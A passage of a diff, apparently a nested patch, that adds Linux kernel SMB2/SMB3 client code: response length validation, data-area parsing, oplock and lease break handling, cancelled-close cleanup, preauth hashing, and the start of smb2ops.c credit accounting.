++	if (shdr->ProtocolId == SMB2_TRANSFORM_PROTO_NUM) {
++		struct smb2_transform_hdr *thdr =
++			(struct smb2_transform_hdr *)buf;
++		struct cifs_ses *ses = NULL;
++		struct cifs_ses *iter;
++
++		/* decrypt frame now that it is completely read in */
++		spin_lock(&cifs_tcp_ses_lock);
++		list_for_each_entry(iter, &pserver->smb_ses_list, smb_ses_list) {
++			if (iter->Suid == le64_to_cpu(thdr->SessionId)) {
++				ses = iter;
++				break;
++			}
++		}
++		spin_unlock(&cifs_tcp_ses_lock);
++		if (!ses) {
++			cifs_dbg(VFS, "no decryption - session id not found\n");
++			return 1;
++		}
++	}
++
++	mid = le64_to_cpu(shdr->MessageId);
++	if (len < pdu_size) {
++		if ((len >= hdr_size)
++		    && (shdr->Status != 0)) {
++			pdu->StructureSize2 = 0;
++			/*
++			 * As with SMB/CIFS, on some error cases servers may
++			 * not return wct properly
++			 */
++			return 0;
++		} else {
++			cifs_dbg(VFS, "Length less than SMB header size\n");
++		}
++		return 1;
++	}
++	if (len > CIFSMaxBufSize + MAX_SMB2_HDR_SIZE) {
++		cifs_dbg(VFS, "SMB length greater than maximum, mid=%llu\n",
++			 mid);
++		return 1;
++	}
++
++	if (check_smb2_hdr(shdr, mid))
++		return 1;
++
++	if (shdr->StructureSize != SMB2_HEADER_STRUCTURE_SIZE) {
++		cifs_dbg(VFS, "Invalid structure size %u\n",
++			 le16_to_cpu(shdr->StructureSize));
++		return 1;
++	}
++
++	command = le16_to_cpu(shdr->Command);
++	if (command >= NUMBER_OF_SMB2_COMMANDS) {
++		cifs_dbg(VFS, "Invalid SMB2 command %d\n", command);
++		return 1;
++	}
++
++	if (smb2_rsp_struct_sizes[command] != pdu->StructureSize2) {
++		if (command != SMB2_OPLOCK_BREAK_HE && (shdr->Status == 0 ||
++		    pdu->StructureSize2 != SMB2_ERROR_STRUCTURE_SIZE2_LE)) {
++			/* error packets have 9 byte structure size */
++			cifs_dbg(VFS, "Invalid response size %u for command %d\n",
++				 le16_to_cpu(pdu->StructureSize2), command);
++			return 1;
++		} else if (command == SMB2_OPLOCK_BREAK_HE
++			   && (shdr->Status == 0)
++			   && (le16_to_cpu(pdu->StructureSize2) != 44)
++			   && (le16_to_cpu(pdu->StructureSize2) != 36)) {
++			/* special case for SMB2.1 lease break message */
++			cifs_dbg(VFS, "Invalid response size %d for oplock break\n",
++				 le16_to_cpu(pdu->StructureSize2));
++			return 1;
++		}
++	}
++
++	calc_len = smb2_calc_size(buf);
++
++	/*
++	 * For SMB2_IOCTL, OutputOffset and OutputLength are optional, so they
++	 * might be 0 and not reflect a real miscalculation.
++	 */
++	if (command == SMB2_IOCTL_HE && calc_len == 0)
++		return 0;
++
++	if (command == SMB2_NEGOTIATE_HE)
++		calc_len += get_neg_ctxt_len(shdr, len, calc_len);
++
++	if (len != calc_len) {
++		/* create failed on symlink */
++		if (command == SMB2_CREATE_HE &&
++		    shdr->Status == STATUS_STOPPED_ON_SYMLINK)
++			return 0;
++		/* Windows 7 server returns 24 bytes more */
++		if (calc_len + 24 == len && command == SMB2_OPLOCK_BREAK_HE)
++			return 0;
++		/* server can return one byte more due to implied bcc[0] */
++		if (calc_len == len + 1)
++			return 0;
++
++		/*
++		 * Some windows servers (win2016) will pad also the final
++		 * PDU in a compound to 8 bytes.
++		 */
++		if (ALIGN(calc_len, 8) == len)
++			return 0;
++
++		/*
++		 * MacOS server pads after SMB2.1 write response with 3 bytes
++		 * of junk. Other servers match RFC1001 len to actual
++		 * SMB2/SMB3 frame length (header + smb2 response specific data)
++		 * Some windows servers also pad up to 8 bytes when compounding.
++		 */
++		if (calc_len < len)
++			return 0;
++
++		/* Only log a message if len was really miscalculated */
++		if (unlikely(cifsFYI))
++			cifs_dbg(FYI, "Server response too short: calculated length %u doesn't match read length %u (cmd=%d, mid=%llu)\n",
++				 calc_len, len, command, mid);
++		else
++			pr_warn("Server response too short: calculated length %u doesn't match read length %u (cmd=%d, mid=%llu)\n",
++				calc_len, len, command, mid);
++
++		return 1;
++	}
++	return 0;
++}
++
++/*
++ * The size of the variable area depends on the offset and length fields,
++ * which are located in different places in the various SMB2 responses.
++ * SMB2 responses with no variable-length info show an offset of zero in
++ * the offset field.
++ */
++static const bool has_smb2_data_area[NUMBER_OF_SMB2_COMMANDS] = {
++	/* SMB2_NEGOTIATE */ true,
++	/* SMB2_SESSION_SETUP */ true,
++	/* SMB2_LOGOFF */ false,
++	/* SMB2_TREE_CONNECT */	false,
++	/* SMB2_TREE_DISCONNECT */ false,
++	/* SMB2_CREATE */ true,
++	/* SMB2_CLOSE */ false,
++	/* SMB2_FLUSH */ false,
++	/* SMB2_READ */	true,
++	/* SMB2_WRITE */ false,
++	/* SMB2_LOCK */	false,
++	/* SMB2_IOCTL */ true,
++	/* SMB2_CANCEL */ false, /* BB CHECK this not listed in documentation */
++	/* SMB2_ECHO */ false,
++	/* SMB2_QUERY_DIRECTORY */ true,
++	/* SMB2_CHANGE_NOTIFY */ true,
++	/* SMB2_QUERY_INFO */ true,
++	/* SMB2_SET_INFO */ false,
++	/* SMB2_OPLOCK_BREAK */ false
++};
++
++/*
++ * Returns a pointer to the beginning of the data area. The length of the
++ * data area and its offset (from the beginning of the SMB) are also returned.
++ */
++char *
++smb2_get_data_area_len(int *off, int *len, struct smb2_hdr *shdr)
++{
++	*off = 0;
++	*len = 0;
++
++	/* error responses do not have data area */
++	if (shdr->Status && shdr->Status != STATUS_MORE_PROCESSING_REQUIRED &&
++	    (((struct smb2_err_rsp *)shdr)->StructureSize) ==
++						SMB2_ERROR_STRUCTURE_SIZE2_LE)
++		return NULL;
++
++	/*
++	 * Following commands have data areas so we have to get the location
++	 * of the data buffer offset and data buffer length for the particular
++	 * command.
++	 */
++	switch (shdr->Command) {
++	case SMB2_NEGOTIATE:
++		*off = le16_to_cpu(
++		  ((struct smb2_negotiate_rsp *)shdr)->SecurityBufferOffset);
++		*len = le16_to_cpu(
++		  ((struct smb2_negotiate_rsp *)shdr)->SecurityBufferLength);
++		break;
++	case SMB2_SESSION_SETUP:
++		*off = le16_to_cpu(
++		  ((struct smb2_sess_setup_rsp *)shdr)->SecurityBufferOffset);
++		*len = le16_to_cpu(
++		  ((struct smb2_sess_setup_rsp *)shdr)->SecurityBufferLength);
++		break;
++	case SMB2_CREATE:
++		*off = le32_to_cpu(
++		    ((struct smb2_create_rsp *)shdr)->CreateContextsOffset);
++		*len = le32_to_cpu(
++		    ((struct smb2_create_rsp *)shdr)->CreateContextsLength);
++		break;
++	case SMB2_QUERY_INFO:
++		*off = le16_to_cpu(
++		    ((struct smb2_query_info_rsp *)shdr)->OutputBufferOffset);
++		*len = le32_to_cpu(
++		    ((struct smb2_query_info_rsp *)shdr)->OutputBufferLength);
++		break;
++	case SMB2_READ:
++		/* TODO: is this a bug? */
++		*off = ((struct smb2_read_rsp *)shdr)->DataOffset;
++		*len = le32_to_cpu(((struct smb2_read_rsp *)shdr)->DataLength);
++		break;
++	case SMB2_QUERY_DIRECTORY:
++		*off = le16_to_cpu(
++		  ((struct smb2_query_directory_rsp *)shdr)->OutputBufferOffset);
++		*len = le32_to_cpu(
++		  ((struct smb2_query_directory_rsp *)shdr)->OutputBufferLength);
++		break;
++	case SMB2_IOCTL:
++		*off = le32_to_cpu(
++		  ((struct smb2_ioctl_rsp *)shdr)->OutputOffset);
++		*len = le32_to_cpu(
++		  ((struct smb2_ioctl_rsp *)shdr)->OutputCount);
++		break;
++	case SMB2_CHANGE_NOTIFY:
++		*off = le16_to_cpu(
++		  ((struct smb2_change_notify_rsp *)shdr)->OutputBufferOffset);
++		*len = le32_to_cpu(
++		  ((struct smb2_change_notify_rsp *)shdr)->OutputBufferLength);
++		break;
++	default:
++		cifs_dbg(VFS, "no length check for command %d\n", le16_to_cpu(shdr->Command));
++		break;
++	}
++
++	/*
++	 * Invalid length or offset probably means data area is invalid, but
++	 * we have little choice but to ignore the data area in this case.
++	 */
++	if (*off > 4096) {
++		cifs_dbg(VFS, "offset %d too large, data area ignored\n", *off);
++		*len = 0;
++		*off = 0;
++	} else if (*off < 0) {
++		cifs_dbg(VFS, "negative offset %d to data invalid ignore data area\n",
++			 *off);
++		*off = 0;
++		*len = 0;
++	} else if (*len < 0) {
++		cifs_dbg(VFS, "negative data length %d invalid, data area ignored\n",
++			 *len);
++		*len = 0;
++	} else if (*len > 128 * 1024) {
++		cifs_dbg(VFS, "data area larger than 128K: %d\n", *len);
++		*len = 0;
++	}
++
++	/* return pointer to beginning of data area, ie offset from SMB start */
++	if ((*off != 0) && (*len != 0))
++		return (char *)shdr + *off;
++	else
++		return NULL;
++}
++
++/*
++ * Calculate the size of the SMB message based on the fixed header
++ * portion, the number of word parameters and the data portion of the message.
++ */
++unsigned int
++smb2_calc_size(void *buf)
++{
++	struct smb2_pdu *pdu = buf;
++	struct smb2_hdr *shdr = &pdu->hdr;
++	int offset; /* the offset from the beginning of SMB to data area */
++	int data_length; /* the length of the variable length data area */
++	/* Structure Size has already been checked to make sure it is 64 */
++	int len = le16_to_cpu(shdr->StructureSize);
++
++	/*
++	 * StructureSize2, ie length of fixed parameter area has already
++	 * been checked to make sure it is the correct length.
++	 */
++	len += le16_to_cpu(pdu->StructureSize2);
++
++	if (has_smb2_data_area[le16_to_cpu(shdr->Command)] == false)
++		goto calc_size_exit;
++
++	smb2_get_data_area_len(&offset, &data_length, shdr);
++	cifs_dbg(FYI, "SMB2 data length %d offset %d\n", data_length, offset);
++
++	if (data_length > 0) {
++		/*
++		 * Check to make sure that data area begins after fixed area,
++		 * Note that last byte of the fixed area is part of data area
++		 * for some commands, typically those with odd StructureSize,
++		 * so we must add one to the calculation.
++		 */
++		if (offset + 1 < len) {
++			cifs_dbg(VFS, "data area offset %d overlaps SMB2 header %d\n",
++				 offset + 1, len);
++			data_length = 0;
++		} else {
++			len = offset + data_length;
++		}
++	}
++calc_size_exit:
++	cifs_dbg(FYI, "SMB2 len %d\n", len);
++	return len;
++}
++
++/* Note: caller must free return buffer */
++__le16 *
++cifs_convert_path_to_utf16(const char *from, struct cifs_sb_info *cifs_sb)
++{
++	int len;
++	const char *start_of_path;
++	__le16 *to;
++	int map_type;
++
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MAP_SFM_CHR)
++		map_type = SFM_MAP_UNI_RSVD;
++	else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MAP_SPECIAL_CHR)
++		map_type = SFU_MAP_UNI_RSVD;
++	else
++		map_type = NO_MAP_UNI_RSVD;
++
++	/* Windows doesn't allow paths beginning with \ */
++	if (from[0] == '\\')
++		start_of_path = from + 1;
++
++	/* SMB311 POSIX extensions paths do not include leading slash */
++	else if (cifs_sb_master_tlink(cifs_sb) &&
++		 cifs_sb_master_tcon(cifs_sb)->posix_extensions &&
++		 (from[0] == '/')) {
++		start_of_path = from + 1;
++	} else
++		start_of_path = from;
++
++	to = cifs_strndup_to_utf16(start_of_path, PATH_MAX, &len,
++				   cifs_sb->local_nls, map_type);
++	return to;
++}
++
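++/*
++ * Translate the cached oplock state of an inode (read/handle/write caching)
++ * into the corresponding SMB2 lease state flags for the wire.
++ */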
++__le32
++smb2_get_lease_state(struct cifsInodeInfo *cinode)
++{
++	__le32 lease = 0;
++
++	if (CIFS_CACHE_WRITE(cinode))
++		lease |= SMB2_LEASE_WRITE_CACHING_LE;
++	if (CIFS_CACHE_HANDLE(cinode))
++		lease |= SMB2_LEASE_HANDLE_CACHING_LE;
++	if (CIFS_CACHE_READ(cinode))
++		lease |= SMB2_LEASE_READ_CACHING_LE;
++	return lease;
++}
++
++struct smb2_lease_break_work {
++	struct work_struct lease_break;
++	struct tcon_link *tlink;
++	__u8 lease_key[16];
++	__le32 lease_state;
++};
++
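++/*
++ * Worker: acknowledge a lease break for a pending open by sending
++ * SMB2_lease_break, then drop the tlink reference that was taken when
++ * the work was queued.
++ */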
++static void
++cifs_ses_oplock_break(struct work_struct *work)
++{
++	struct smb2_lease_break_work *lw = container_of(work,
++				struct smb2_lease_break_work, lease_break);
++	int rc = 0;
++
++	rc = SMB2_lease_break(0, tlink_tcon(lw->tlink), lw->lease_key,
++			      lw->lease_state);
++
++	cifs_dbg(FYI, "Lease release rc %d\n", rc);
++	cifs_put_tlink(lw->tlink);
++	kfree(lw);
++}
++
++static void
++smb2_queue_pending_open_break(struct tcon_link *tlink, __u8 *lease_key,
++			      __le32 new_lease_state)
++{
++	struct smb2_lease_break_work *lw;
++
++	lw = kmalloc(sizeof(struct smb2_lease_break_work), GFP_KERNEL);
++	if (!lw) {
++		cifs_put_tlink(tlink);
++		return;
++	}
++
++	INIT_WORK(&lw->lease_break, cifs_ses_oplock_break);
++	lw->tlink = tlink;
++	lw->lease_state = new_lease_state;
++	memcpy(lw->lease_key, lease_key, SMB2_LEASE_KEY_SIZE);
++	queue_work(cifsiod_wq, &lw->lease_break);
++}
++
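++/*
++ * Scan the tcon's open file list for a file whose lease key matches the
++ * break we received; if found, record the new lease state and queue the
++ * oplock break work. Returns true if the break was dispatched.
++ */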
++static bool
++smb2_tcon_has_lease(struct cifs_tcon *tcon, struct smb2_lease_break *rsp)
++{
++	__u8 lease_state;
++	struct cifsFileInfo *cfile;
++	struct cifsInodeInfo *cinode;
++	int ack_req = le32_to_cpu(rsp->Flags &
++				  SMB2_NOTIFY_BREAK_LEASE_FLAG_ACK_REQUIRED);
++
++	lease_state = le32_to_cpu(rsp->NewLeaseState);
++
++	list_for_each_entry(cfile, &tcon->openFileList, tlist) {
++		cinode = CIFS_I(d_inode(cfile->dentry));
++
++		if (memcmp(cinode->lease_key, rsp->LeaseKey,
++							SMB2_LEASE_KEY_SIZE))
++			continue;
++
++		cifs_dbg(FYI, "found in the open list\n");
++		cifs_dbg(FYI, "lease key match, lease break 0x%x\n",
++			 lease_state);
++
++		if (ack_req)
++			cfile->oplock_break_cancelled = false;
++		else
++			cfile->oplock_break_cancelled = true;
++
++		set_bit(CIFS_INODE_PENDING_OPLOCK_BREAK, &cinode->flags);
++
++		cfile->oplock_epoch = le16_to_cpu(rsp->Epoch);
++		cfile->oplock_level = lease_state;
++
++		cifs_queue_oplock_break(cfile);
++		return true;
++	}
++
++	return false;
++}
++
++static struct cifs_pending_open *
++smb2_tcon_find_pending_open_lease(struct cifs_tcon *tcon,
++				  struct smb2_lease_break *rsp)
++{
++	__u8 lease_state = le32_to_cpu(rsp->NewLeaseState);
++	int ack_req = le32_to_cpu(rsp->Flags &
++				  SMB2_NOTIFY_BREAK_LEASE_FLAG_ACK_REQUIRED);
++	struct cifs_pending_open *open;
++	struct cifs_pending_open *found = NULL;
++
++	list_for_each_entry(open, &tcon->pending_opens, olist) {
++		if (memcmp(open->lease_key, rsp->LeaseKey,
++			   SMB2_LEASE_KEY_SIZE))
++			continue;
++
++		if (!found && ack_req) {
++			found = open;
++		}
++
++		cifs_dbg(FYI, "found in the pending open list\n");
++		cifs_dbg(FYI, "lease key match, lease break 0x%x\n",
++			 lease_state);
++
++		open->oplock = lease_state;
++	}
++
++	return found;
++}
++
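++/*
++ * Walk every session and tcon on the primary channel looking for an open
++ * file, pending open, or cached directory whose lease key matches the
++ * incoming lease break. Returns true once the break has been handled.
++ */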
++static bool
++smb2_is_valid_lease_break(char *buffer, struct TCP_Server_Info *server)
++{
++	struct smb2_lease_break *rsp = (struct smb2_lease_break *)buffer;
++	struct TCP_Server_Info *pserver;
++	struct cifs_ses *ses;
++	struct cifs_tcon *tcon;
++	struct cifs_pending_open *open;
++
++	cifs_dbg(FYI, "Checking for lease break\n");
++
++	/* If server is a channel, select the primary channel */
++	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
++
++	/* look up tcon based on tid & uid */
++	spin_lock(&cifs_tcp_ses_lock);
++	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
++		list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
++			spin_lock(&tcon->open_file_lock);
++			cifs_stats_inc(
++				       &tcon->stats.cifs_stats.num_oplock_brks);
++			if (smb2_tcon_has_lease(tcon, rsp)) {
++				spin_unlock(&tcon->open_file_lock);
++				spin_unlock(&cifs_tcp_ses_lock);
++				return true;
++			}
++			open = smb2_tcon_find_pending_open_lease(tcon,
++								 rsp);
++			if (open) {
++				__u8 lease_key[SMB2_LEASE_KEY_SIZE];
++				struct tcon_link *tlink;
++
++				tlink = cifs_get_tlink(open->tlink);
++				memcpy(lease_key, open->lease_key,
++				       SMB2_LEASE_KEY_SIZE);
++				spin_unlock(&tcon->open_file_lock);
++				spin_unlock(&cifs_tcp_ses_lock);
++				smb2_queue_pending_open_break(tlink,
++							      lease_key,
++							      rsp->NewLeaseState);
++				return true;
++			}
++			spin_unlock(&tcon->open_file_lock);
++
++			if (cached_dir_lease_break(tcon, rsp->LeaseKey)) {
++				spin_unlock(&cifs_tcp_ses_lock);
++				return true;
++			}
++		}
++	}
++	spin_unlock(&cifs_tcp_ses_lock);
++	cifs_dbg(FYI, "Can not process lease break - no lease matched\n");
++	trace_smb3_lease_not_found(le32_to_cpu(rsp->CurrentLeaseState),
++				   le32_to_cpu(rsp->hdr.Id.SyncId.TreeId),
++				   le64_to_cpu(rsp->hdr.SessionId),
++				   *((u64 *)rsp->LeaseKey),
++				   *((u64 *)&rsp->LeaseKey[8]));
++
++	return false;
++}
++
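++/*
++ * Entry point for server-initiated break notifications. A StructureSize of
++ * 44 means this is really a lease break, handled above; otherwise match the
++ * persistent/volatile file ids against our open files and queue the break.
++ */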
++bool
++smb2_is_valid_oplock_break(char *buffer, struct TCP_Server_Info *server)
++{
++	struct smb2_oplock_break *rsp = (struct smb2_oplock_break *)buffer;
++	struct TCP_Server_Info *pserver;
++	struct cifs_ses *ses;
++	struct cifs_tcon *tcon;
++	struct cifsInodeInfo *cinode;
++	struct cifsFileInfo *cfile;
++
++	cifs_dbg(FYI, "Checking for oplock break\n");
++
++	if (rsp->hdr.Command != SMB2_OPLOCK_BREAK)
++		return false;
++
++	if (rsp->StructureSize !=
++				smb2_rsp_struct_sizes[SMB2_OPLOCK_BREAK_HE]) {
++		if (le16_to_cpu(rsp->StructureSize) == 44)
++			return smb2_is_valid_lease_break(buffer, server);
++		else
++			return false;
++	}
++
++	cifs_dbg(FYI, "oplock level 0x%x\n", rsp->OplockLevel);
++
++	/* If server is a channel, select the primary channel */
++	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
++
++	/* look up tcon based on tid & uid */
++	spin_lock(&cifs_tcp_ses_lock);
++	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
++		list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
++
++			spin_lock(&tcon->open_file_lock);
++			list_for_each_entry(cfile, &tcon->openFileList, tlist) {
++				if (rsp->PersistentFid !=
++				    cfile->fid.persistent_fid ||
++				    rsp->VolatileFid !=
++				    cfile->fid.volatile_fid)
++					continue;
++
++				cifs_dbg(FYI, "file id match, oplock break\n");
++				cifs_stats_inc(
++				    &tcon->stats.cifs_stats.num_oplock_brks);
++				cinode = CIFS_I(d_inode(cfile->dentry));
++				spin_lock(&cfile->file_info_lock);
++				if (!CIFS_CACHE_WRITE(cinode) &&
++				    rsp->OplockLevel == SMB2_OPLOCK_LEVEL_NONE)
++					cfile->oplock_break_cancelled = true;
++				else
++					cfile->oplock_break_cancelled = false;
++
++				set_bit(CIFS_INODE_PENDING_OPLOCK_BREAK,
++					&cinode->flags);
++
++				cfile->oplock_epoch = 0;
++				cfile->oplock_level = rsp->OplockLevel;
++
++				spin_unlock(&cfile->file_info_lock);
++
++				cifs_queue_oplock_break(cfile);
++
++				spin_unlock(&tcon->open_file_lock);
++				spin_unlock(&cifs_tcp_ses_lock);
++				return true;
++			}
++			spin_unlock(&tcon->open_file_lock);
++		}
++	}
++	spin_unlock(&cifs_tcp_ses_lock);
++	cifs_dbg(FYI, "No file id matched, oplock break ignored\n");
++	trace_smb3_oplock_not_found(0 /* no xid */, rsp->PersistentFid,
++				  le32_to_cpu(rsp->hdr.Id.SyncId.TreeId),
++				  le64_to_cpu(rsp->hdr.SessionId));
++
++	return true;
++}
++
++void
++smb2_cancelled_close_fid(struct work_struct *work)
++{
++	struct close_cancelled_open *cancelled = container_of(work,
++					struct close_cancelled_open, work);
++	struct cifs_tcon *tcon = cancelled->tcon;
++	int rc;
++
++	if (cancelled->mid)
++		cifs_tcon_dbg(VFS, "Close unmatched open for MID:%llu\n",
++			      cancelled->mid);
++	else
++		cifs_tcon_dbg(VFS, "Close interrupted close\n");
++
++	rc = SMB2_close(0, tcon, cancelled->fid.persistent_fid,
++			cancelled->fid.volatile_fid);
++	if (rc)
++		cifs_tcon_dbg(VFS, "Close cancelled mid failed rc:%d\n", rc);
++
++	cifs_put_tcon(tcon);
++	kfree(cancelled);
++}
++
++/*
++ * Caller should already hold an extra reference to @tcon.
++ * This function is used to queue work to close a handle to prevent leaks
++ * on the server.
++ * We handle two cases: first, when an open was interrupted after we sent
++ * the SMB2_CREATE to the server but before we processed the reply, and
++ * second, when a close was interrupted before we sent the SMB2_CLOSE.
++ */
++static int
++__smb2_handle_cancelled_cmd(struct cifs_tcon *tcon, __u16 cmd, __u64 mid,
++			    __u64 persistent_fid, __u64 volatile_fid)
++{
++	struct close_cancelled_open *cancelled;
++
++	cancelled = kzalloc(sizeof(*cancelled), GFP_ATOMIC);
++	if (!cancelled)
++		return -ENOMEM;
++
++	cancelled->fid.persistent_fid = persistent_fid;
++	cancelled->fid.volatile_fid = volatile_fid;
++	cancelled->tcon = tcon;
++	cancelled->cmd = cmd;
++	cancelled->mid = mid;
++	INIT_WORK(&cancelled->work, smb2_cancelled_close_fid);
++	WARN_ON(queue_work(cifsiod_wq, &cancelled->work) == false);
++
++	return 0;
++}
++
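++/*
++ * Queue an asynchronous close for a handle whose close was interrupted.
++ * Bumps the tcon refcount first (dropped again by the worker), and skips
++ * the retry entirely if the tcon is already being torn down.
++ */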
++int
++smb2_handle_cancelled_close(struct cifs_tcon *tcon, __u64 persistent_fid,
++			    __u64 volatile_fid)
++{
++	int rc;
++
++	cifs_dbg(FYI, "%s: tc_count=%d\n", __func__, tcon->tc_count);
++	spin_lock(&cifs_tcp_ses_lock);
++	if (tcon->tc_count <= 0) {
++		struct TCP_Server_Info *server = NULL;
++
++		WARN_ONCE(tcon->tc_count < 0, "tcon refcount is negative");
++		spin_unlock(&cifs_tcp_ses_lock);
++
++		if (tcon->ses)
++			server = tcon->ses->server;
++
++		cifs_server_dbg(FYI, "tid=0x%x: tcon is closing, skipping async close retry of fid %llu %llu\n",
++				tcon->tid, persistent_fid, volatile_fid);
++
++		return 0;
++	}
++	tcon->tc_count++;
++	spin_unlock(&cifs_tcp_ses_lock);
++
++	rc = __smb2_handle_cancelled_cmd(tcon, SMB2_CLOSE_HE, 0,
++					 persistent_fid, volatile_fid);
++	if (rc)
++		cifs_put_tcon(tcon);
++
++	return rc;
++}
++
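++/*
++ * Called for a cancelled mid: if the abandoned reply turns out to be a
++ * successful SMB2_CREATE that we never processed, queue a close of the
++ * returned file ids so the handle does not leak on the server.
++ */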
++int
++smb2_handle_cancelled_mid(struct mid_q_entry *mid, struct TCP_Server_Info *server)
++{
++	struct smb2_hdr *hdr = mid->resp_buf;
++	struct smb2_create_rsp *rsp = mid->resp_buf;
++	struct cifs_tcon *tcon;
++	int rc;
++
++	if ((mid->optype & CIFS_CP_CREATE_CLOSE_OP) || hdr->Command != SMB2_CREATE ||
++	    hdr->Status != STATUS_SUCCESS)
++		return 0;
++
++	tcon = smb2_find_smb_tcon(server, le64_to_cpu(hdr->SessionId),
++				  le32_to_cpu(hdr->Id.SyncId.TreeId));
++	if (!tcon)
++		return -ENOENT;
++
++	rc = __smb2_handle_cancelled_cmd(tcon,
++					 le16_to_cpu(hdr->Command),
++					 le64_to_cpu(hdr->MessageId),
++					 rsp->PersistentFileId,
++					 rsp->VolatileFileId);
++	if (rc)
++		cifs_put_tcon(tcon);
++
++	return rc;
++}
++
++/**
++ * smb311_update_preauth_hash - update @ses hash with the packet data in @iov
++ *
++ * Assumes @iov does not contain the rfc1002 length and iov[0] has the
++ * SMB2 header.
++ *
++ * @ses:	server session structure
++ * @server:	pointer to server info
++ * @iov:	array containing the SMB request we will send to the server
++ * @nvec:	number of array entries for the iov
++ */
++int
++smb311_update_preauth_hash(struct cifs_ses *ses, struct TCP_Server_Info *server,
++			   struct kvec *iov, int nvec)
++{
++	int i, rc;
++	struct smb2_hdr *hdr;
++	struct shash_desc *sha512 = NULL;
++
++	hdr = (struct smb2_hdr *)iov[0].iov_base;
++	/* neg prot are always taken */
++	if (hdr->Command == SMB2_NEGOTIATE)
++		goto ok;
++
++	/*
++	 * If we process a command which wasn't a negprot it means the
++	 * neg prot was already done, so the server dialect was set
++	 * and we can test it. Preauth requires 3.1.1 for now.
++	 */
++	if (server->dialect != SMB311_PROT_ID)
++		return 0;
++
++	if (hdr->Command != SMB2_SESSION_SETUP)
++		return 0;
++
++	/* skip last sess setup response */
++	if ((hdr->Flags & SMB2_FLAGS_SERVER_TO_REDIR) &&
++	    (hdr->Status == NT_STATUS_OK ||
++	     (hdr->Status != cpu_to_le32(NT_STATUS_MORE_PROCESSING_REQUIRED))))
++		return 0;
++
++ok:
++	rc = smb311_crypto_shash_allocate(server);
++	if (rc)
++		return rc;
++
++	sha512 = server->secmech.sha512;
++	rc = crypto_shash_init(sha512);
++	if (rc) {
++		cifs_dbg(VFS, "%s: Could not init sha512 shash\n", __func__);
++		return rc;
++	}
++
++	rc = crypto_shash_update(sha512, ses->preauth_sha_hash,
++				 SMB2_PREAUTH_HASH_SIZE);
++	if (rc) {
++		cifs_dbg(VFS, "%s: Could not update sha512 shash\n", __func__);
++		return rc;
++	}
++
++	for (i = 0; i < nvec; i++) {
++		rc = crypto_shash_update(sha512, iov[i].iov_base, iov[i].iov_len);
++		if (rc) {
++			cifs_dbg(VFS, "%s: Could not update sha512 shash\n",
++				 __func__);
++			return rc;
++		}
++	}
++
++	rc = crypto_shash_final(sha512, ses->preauth_sha_hash);
++	if (rc) {
++		cifs_dbg(VFS, "%s: Could not finalize sha512 shash\n",
++			 __func__);
++		return rc;
++	}
++
++	return 0;
++}
+diff --git a/fs/smb/client/smb2ops.c b/fs/smb/client/smb2ops.c
+new file mode 100644
+index 0000000000000..d512440d35b6f
+--- /dev/null
++++ b/fs/smb/client/smb2ops.c
+@@ -0,0 +1,5805 @@
++// SPDX-License-Identifier: GPL-2.0
++/*
++ *  SMB2 version specific operations
++ *
++ *  Copyright (c) 2012, Jeff Layton <jlayton@redhat.com>
++ */
++
++#include <linux/pagemap.h>
++#include <linux/vfs.h>
++#include <linux/falloc.h>
++#include <linux/scatterlist.h>
++#include <linux/uuid.h>
++#include <linux/sort.h>
++#include <crypto/aead.h>
++#include <linux/fiemap.h>
++#include <uapi/linux/magic.h>
++#include "cifsfs.h"
++#include "cifsglob.h"
++#include "smb2pdu.h"
++#include "smb2proto.h"
++#include "cifsproto.h"
++#include "cifs_debug.h"
++#include "cifs_unicode.h"
++#include "smb2status.h"
++#include "smb2glob.h"
++#include "cifs_ioctl.h"
++#include "smbdirect.h"
++#include "fscache.h"
++#include "fs_context.h"
++#include "cached_dir.h"
++
++/* Change credits for different ops and return the total number of credits */
++static int
++change_conf(struct TCP_Server_Info *server)
++{
++	server->credits += server->echo_credits + server->oplock_credits;
++	server->oplock_credits = server->echo_credits = 0;
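++	/*
++	 * With all credits pooled, decide what we can afford: one credit
++	 * keeps only regular requests alive, two adds echoes, and three or
++	 * more lets us also reserve a credit for oplock breaks (when
++	 * oplocks are enabled).
++	 */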
++	switch (server->credits) {
++	case 0:
++		return 0;
++	case 1:
++		server->echoes = false;
++		server->oplocks = false;
++		break;
++	case 2:
++		server->echoes = true;
++		server->oplocks = false;
++		server->echo_credits = 1;
++		break;
++	default:
++		server->echoes = true;
++		if (enable_oplocks) {
++			server->oplocks = true;
++			server->oplock_credits = 1;
++		} else
++			server->oplocks = false;
++
++		server->echo_credits = 1;
++	}
++	server->credits -= server->echo_credits + server->oplock_credits;
++	return server->credits + server->echo_credits + server->oplock_credits;
++}
++
++static void
++smb2_add_credits(struct TCP_Server_Info *server,
++		 const struct cifs_credits *credits, const int optype)
++{
++	int *val, rc = -1;
++	int scredits, in_flight;
++	unsigned int add = credits->value;
++	unsigned int instance = credits->instance;
++	bool reconnect_detected = false;
++	bool reconnect_with_invalid_credits = false;
++
++	spin_lock(&server->req_lock);
++	val = server->ops->get_credits_field(server, optype);
++
++	/* e.g. found a case where a write overlapping reconnect messed up credits */
++	if (((optype & CIFS_OP_MASK) == CIFS_NEG_OP) && (*val != 0))
++		reconnect_with_invalid_credits = true;
++
++	if ((instance == 0) || (instance == server->reconnect_instance))
++		*val += add;
++	else
++		reconnect_detected = true;
++
++	if (*val > 65000) {
++		*val = 65000; /* Don't get near 64K credits, avoid srv bugs */
++		pr_warn_once("server overflowed SMB3 credits\n");
++		trace_smb3_overflow_credits(server->CurrentMid,
++					    server->conn_id, server->hostname, *val,
++					    add, server->in_flight);
++	}
++	server->in_flight--;
++	if (server->in_flight == 0 &&
++	   ((optype & CIFS_OP_MASK) != CIFS_NEG_OP) &&
++	   ((optype & CIFS_OP_MASK) != CIFS_SESS_OP))
++		rc = change_conf(server);
++	/*
++	 * Sometimes server returns 0 credits on oplock break ack - we need to
++	 * rebalance credits in this case.
++	 */
++	else if (server->in_flight > 0 && server->oplock_credits == 0 &&
++		 server->oplocks) {
++		if (server->credits > 1) {
++			server->credits--;
++			server->oplock_credits++;
++		}
++	}
++	scredits = *val;
++	in_flight = server->in_flight;
++	spin_unlock(&server->req_lock);
++	wake_up(&server->request_q);
++
++	if (reconnect_detected) {
